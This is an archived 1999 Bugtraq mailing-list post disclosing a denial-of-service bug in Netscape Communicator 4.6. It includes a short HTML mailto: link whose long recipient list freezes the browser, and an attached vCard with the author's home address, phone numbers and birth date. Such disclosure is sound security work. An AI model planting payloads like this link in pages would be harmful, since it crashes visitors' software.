[10918] in bugtraq
Netscape 4.6 DoS
daemon@ATHENA.MIT.EDU (Philip Stoev)
Wed Jun 30 14:05:13 1999
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000E_01BEC332.CF446620"
Message-Id: <001101bec319$adede3c0$d600a8c0@einet.bg>
Date: Wed, 30 Jun 1999 19:57:40 +0300
Reply-To: Philip Stoev <philip@EINET.BG>
From: Philip Stoev <philip@EINET.BG>
To: BUGTRAQ@NETSPACE.ORG
This is a multi-part message in MIME format.
------=_NextPart_000_000E_01BEC332.CF446620
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: 7bit
Netscape 4.6 Win98 (possibly other versions as well) process mailto: URLs so
that each item in the URL becomes a recepient of the empty message that
opens up for editing.
Therefore, an URL like:
<a href="mailto:
["a " repeated 10000000 times]
"> Click here </a>
such as:
<a href="mailto:
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
"> Click here </a>
will make Communicator open up an email message and start inserting hundreds
of recepients into the header part, effectively shutting down until this
process is complete (minutes or more?).
Philip Stoev - http://jobs.einet.bg/philip.html
Get your job @ EuroIntegra e-JOBS (http://jobs.einet.bg)
------=_NextPart_000_000E_01BEC332.CF446620
Content-Type: text/x-vcard;
name="Philip Stoev.vcf"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="Philip Stoev.vcf"
BEGIN:VCARD
VERSION:2.1
N:Stoev;Philip;Dimitrov;Mr.
FN:Philip Stoev
NICKNAME:Philip
ORG:EuroIntegra Ltd.;Technical Support
TITLE:Senior Technical Support
TEL;WORK;VOICE:359 2 954 94 88
TEL;HOME;VOICE:359 2 81 59 49
TEL;WORK;FAX:359 2 544 669
ADR;WORK;ENCODING=3DQUOTED-PRINTABLE:;;Baba Iliitza 2=3D0D=3D0ABl. 80A =
fl. 14;Sofia;BG;;Bulgaria
LABEL;WORK;ENCODING=3DQUOTED-PRINTABLE:Baba Iliitza 2=3D0D=3D0ABl. 80A =
fl. 14=3D0D=3D0ASofia, BG=3D0D=3D0ABulgaria
ADR;HOME:;;Geo Milev 40/B;Sofia;BG;1111;Bulgaria
LABEL;HOME;ENCODING=3DQUOTED-PRINTABLE:Geo Milev 40/B=3D0D=3D0ASofia, BG =
1111=3D0D=3D0ABulgaria
URL:http://studywiz.hypermart.net
URL:http://www.einet.bg
BDAY:19800517
EMAIL;PREF;INTERNET:philip@einet.bg
EMAIL;INTERNET:philip_stoev@iname.com
REV:19990630T165740Z
END:VCARD
------=_NextPart_000_000E_01BEC332.CF446620--
